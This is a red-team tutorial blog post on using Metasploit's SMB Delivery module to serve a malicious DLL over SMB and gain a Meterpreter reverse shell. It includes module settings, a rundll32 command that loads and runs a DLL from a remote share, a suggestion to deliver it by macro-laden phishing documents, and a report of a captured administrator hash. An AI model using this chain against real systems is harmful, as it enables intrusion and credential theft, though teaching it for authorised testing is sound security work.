R3d Buck3T
Published in

R3d Buck3T


DLL Injection Over SMB Service

Privilege Escalation & Defense Evasion — MITRE ATT&CK (T1055)

Metasploit Framework

Dynamic Link libraries, knowns as DLLs, are blocks of code containing data that provide instructions on how to run programs within the Windows system. If the DLLs are malicious, they can execute arbitrary code in memory and perform various nefarious operations.

An attacker can write a malicious DLL that gets injected into memory to elevate their privileges or evade detection. They can use this technique to gain initial network access or establish persistence.

In a red team assessment, attackers can embed DLLs in Macros within Microsoft Office documents and deliver them to the target through a spear-phishing campaign. Once a target opens the document and clicks on enable the Macro, the DLL payload triggers, and the attacker gains a reverse shell that allows them to execute commands on the compromised machine.

In this post, we will learn about the Metasploit module SMB Delivery that generates malicious DLL payloads and servers them via an SMB server.

Requirements ✏️

  • Metasploit Module — SMB Delivery
  • Windows machine as a target
  • Open SMB port — (TCP 445)

Objectives 🎯

  • The goal is to gain initial access to a network or establish persistence.

Attack Steps🔥

In the Kali machine, open up Metasploit with sudo msfconsole, search for the SMB Delivery module, and type use 0 to select it.

Metasploit — SMB Delivery Module
Figure 1 — shows selecting the SMB Delivery module.

Next, type Options to show details about the selected module. The required options to run the exploit are the target IP address (SRVHOST) and port number 445 (SRVPORT). The payload can be reverse_https or reverse_tcp; in this demo, I used reverse_tcp.

💡One thing to note is that I had trouble setting the IP address of the SRVHOST with this module. Every time I ran the exploit with a specified IP address, I would get BindFail errors“[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable.”

[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable
Figure 2 — shows the generated BindFail error when the SRVHOST IP was set.

After researching and digging into older comments in GitHub for Metasploit bind errors, I learned that this module is buggy on the Metasploit framework version v6.2.4-dev. The only solution that worked for me was running the exploit without setting the SRVHOST IP address ( later replacing it with the listener IP address.

Figure 3— shows the module details without setting the SRVHOST IP

For the payload information, ensure you have the correct listener address, your attacking machine IP address, and any port number that is not in use. Once everything is ready, type run or exploit to run the module.

SMB Delivery — generating malicious DLL
Figure 4 — shows the generated DLL file after running the module

When the payload is generated rundll32.exe \\\tASoq\test.dll,0 , replace with the attacker IP address— rundll32.exe \\\tASoq\test.dll,0 .

The generated payload uses the Rundll32.exe application, which allows launching the functionalities stored in the shared .dll file and storing them in memory.

Figure 5- shows the modified payload with the target IP address.

The following step is to execute the payload on the target machine; you can run in file explorer or PowerShell/CMD prompt.

💡 This post only shows how to generate DLL files with the SMB Delivery module ; in future posts, we will discuss how to deliver these payloads in a real-world scenarios.

Figure 6- shows executing the payload in the target server using file explorer.

When the payload is executed successfully, a Meterpreter shell opens and shows the captured NTLMv2hash of the compromised user. In this case, it was the administrator hash.

That’s all for this post; thanks for stopping by!!



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nairuz Abulhul

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher